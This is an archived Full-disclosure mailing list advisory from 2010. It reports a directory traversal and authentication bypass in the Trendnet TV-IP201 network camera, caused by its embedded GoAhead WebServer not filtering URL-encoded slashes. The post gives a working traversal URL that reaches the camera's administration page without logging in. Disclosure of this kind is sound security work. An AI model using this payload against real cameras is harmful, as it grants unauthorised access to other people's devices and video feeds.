[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] Directory traversal & authentication bypass of Trendnet TV-IP201
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] Directory traversal & authentication bypass of Trendnet TV-IP201
- From: opticfiber <opticfiber@xxxxxxxxxxxx>
- Date: Tue, 16 Feb 2010 16:41:42 -0500
simply go to http://ipaddress of
camera/..%5C..%5C..%5C..%5C..%5C..%5C/config/tcfg_system.asp (system
administration page)
These cams use an embedded version of GoAhead WebServer which is
vulnerable to the above attack because they don't correctly filter URL
encoded substitutions for the '/' character. Original vulnerability
and further explanation posted here:
http://www.securityfocus.com/bid/5197/info
William Reyor
--
Genius is one percent inspiration and ninety-nine percent perspiration.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/